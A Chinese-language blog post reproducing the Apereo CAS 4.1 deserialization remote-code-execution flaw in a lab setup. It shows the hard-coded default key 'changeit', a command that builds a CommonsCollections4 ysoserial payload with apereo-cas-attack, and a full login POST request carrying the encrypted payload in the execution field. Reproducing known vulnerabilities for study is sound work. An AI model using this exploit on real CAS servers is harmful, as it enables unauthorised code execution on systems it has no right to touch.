joker0xxx3's Blog

现实告诉我：保持好奇心，享受孤独

Apereo CAS 4.1反序列化RCE漏洞

发表于 2021-05-01 | 分类于漏洞复现 |

Apereo CAS 4.1反序列化RCE漏洞

Apereo CAS是企业单点登录系统。CAS尝试通过Apache Commons Collections库对对象进行反序列化的过程中存在一个问题，这种情况引起了RCE漏洞。

参考：

https://apereo.github.io/2016/04/08/commonsvulndisc/

启动Apereo CAS后，请访问http://192.168.44.132:8080/cas/login以查看登录页面。

利用

4.1.7之前的Apereo CAS的现成默认配置使用默认密钥changeit：

public class EncryptedTranscoder implements Transcoder {
    private CipherBean cipherBean;
    private boolean compression = true;

    public EncryptedTranscoder() throws IOException {
        BufferedBlockCipherBean bufferedBlockCipherBean = new BufferedBlockCipherBean();
        bufferedBlockCipherBean.setBlockCipherSpec(new BufferedBlockCipherSpec("AES", "CBC", "PKCS7"));
        bufferedBlockCipherBean.setKeyStore(this.createAndPrepareKeyStore());
        bufferedBlockCipherBean.setKeyAlias("aes128");
        bufferedBlockCipherBean.setKeyPassword("changeit");
        bufferedBlockCipherBean.setNonce(new RBGNonce());
        this.setCipherBean(bufferedBlockCipherBean);
    }

    // ...

可以尝试使用Apereo-CAS-Attack生成加密的ysoserial的序列化对象：

1	java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/success"

然后，从登录操作中拦截并修改http请求/cas/login，将有效负载放入execution的值中：

POST /cas/login HTTP/1.1
Host: 192.168.44.132:8080
Content-Length: 2290
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.44.132:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.44.132:8080/cas/login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=504D29BC1AC0C627D269FD50E48691C1
Connection: close

username=test&password=testt&lt=LT-3-Kz6ZfST1l90TARv9DrSGdo6PjgdUoT-cas01.example.org&execution=e7dd4974-27ab-4052-a7fb-bd85e6c2fbe5_AAAAIgAAABCUJFoJfNGzFhudnZYMaIgIAAAABmFlczEyOEdb%2BTkE7I%2BXg2A5D9zQX%2FJZTxymRFgtso29ahEkVPD0AKqLhf5uS0H47YF3p5CAuWvOX5XCRNutljiJsL%2BWfwx0ObeDfdR0Y6%2BvsPqXHe7mg0ID5fuv%2BhHFdlygzW%2FLWUWQVWYSMb8EP0EtMJBGDggopCDlhkrcETOjMSJjrb1lhZUqW%2B2yYr%2Fgl2GhrEWNqFgY2CIcAV0WDeU7uO%2BGyOFcf1szw1L9bs02ySMpr%2FsGdUERI3cbrj71lRchvpQPmTCVsZEuzrdPCgiZ8xKyc8LCQ0Rcp%2F10xBGy5ViXTkhDF9kpdQd1KComTBmsr5t1JSSRPfXsIIXS3uXt76ahmlq%2F4inUq%2BH7rhyqAMdq9KUfHMkgmetc0fOOgWK2yzmWO2mdwvSpA94rAKJlUJBaQa%2BEBA4vTY5O16g8ndIFixmOmcJJZ9u%2B5nfNx2Y8HQRiWdfgWKSbLZ%2BsxCKIbFcTq5jWMgwGXnc7vphGmX9E1jFNP0EuzK%2BlhB8dBHrzyHD3fOB5t7z42kjeB9sHl0XP94dGdyvKxxgV4x1hh2Xv7rx6s%2F%2FhqrpvaRsw4V228UWIcsGUXa2rUsgBg7UUQ3KDkg4smdmOiUZBXrYJ409F42F03lNaI26IoTexHJz%2B4NZNjUiNqm%2BSovwiE%2FK%2FGwm4Xehz5EfhB1B8QQh5f91opk7m1Bm8X6RlStF4lcFl7k8cHt%2FJUtU03ohAVRdWLm4jnTw55S%2B8TFakRzyvuuPRbgLTbx3usYqlj4Y5ysiBwfAI3wRW8RJKkwzFwxsH9d1wC8THxDq76eR1l44sa39PaogS94ZNQVr%2FOc0W7s8hpkYQa79UkJjvUPt%2FeRPeikskrby4uW2DS19F%2BHlBhTUZhFXxIIZf5%2FzV3H1Ph80yJKRnsU6bhlUDAslC%2BM2hll4z9ow8xcZ4LZWpjkCSL3H%2BTExZ0w3eaw%2FKasAM7NEO4sW9aO46wzNarlsaZP657jS2dFL%2BR0W858gwWKx2nUuCWEuKNAw0wkSlxUqQTFjy62FPyXjSHa0hcs67L80dkAB5praeNNDOOAhhfoTaIn6sEBho4sXtBFJtz%2FvY%2F9ELtpKcHGEXYzSHeQhMc9kie%2BqqDHHIh43mkPEk0O5DHszL5dS62AbtiF%2B1YQMySsFzGLzxLLY3Ru5P7v52Fup7HpmyiCSfX0PAvwuy0JQtt9OhpFYFzJyHyT%2FOVHk25kEmDeOwa5A9%2FEQ8ZhLaWLV7X0FCRSmMr2zPWivDNyQMWwCsFjif52o%2ByTdX5Ta0oHXBfNHwRV3MsF9KGVqKDl%2Bkbj1N3ztLIzw2wUdT5Yk0FKNpGJdVaosWD5gUwCijk7MAbXQSWoH4q98QWquTPTwFX80kLu%2F1wDSZpELnMAutggEqzsi99RKNbTbWJZoPcPtRjrCQfYCOIB3GGOIlYWM9XOdndM%2FCo7aJDPwJD1GSXG9Oxw8a1G789moUXzc31IGkd8a3tQxQD64N7PhnJ80PrqxD%2FnNyVmTqmN2eFJREsvSkf3KUi85p%2BH5zvK4hmYq6mGuXO8fyHmmIG%2Fl%2Fm2ARx1zPIAJkc%2BkugkY3QOr5MDYY9j%2FCjgsQ3IfWRF2tvIm4b9wv0QQnQNikUcTLBVmEE%2FrXhCYXUtFhk90eyqk%2BI%2FAXtlwyE%2F8Y8d6TpjkxQljd5enhRh38xeXPzSwJXHiPPZNf5%2F8RkFP3r0FbVbllIrV5za6qYHkq3rE%2BcRQEBBJtFr0sAo1Qvaer0ar2nTtKPrGgxfajlM7N0BDS9FZg6BoQvQRCeG3peYWbWLghXlKXHGDHtYsntzZTXLFMZVdjwhs9nxSv9qyFPkA1Fwh6ZcwsPQSzZTo2%2Fy3VwD3nwlW%2BLaRjzlwjZeIJk0iJ15x8ijObD%2F86tzlCNm1Bo8Y11Bwo%2BKPVX5VYuGvEXXdtQbI8sCTET4vTPzR2JgzMf0VKLhKF9fMKWkpPONcXicN1jqAkhYGS&_eventId=submit&submit=LOGIN

touch /tmp/success已成功执行：

本文作者： joker0xxx3
本文链接： http://joker-vip.github.io/2021/05/01/Apereo%20CAS%204.1%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96RCE%E6%BC%8F%E6%B4%9E/
版权声明： 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 3.0 许可协议。转载请注明出处！

0%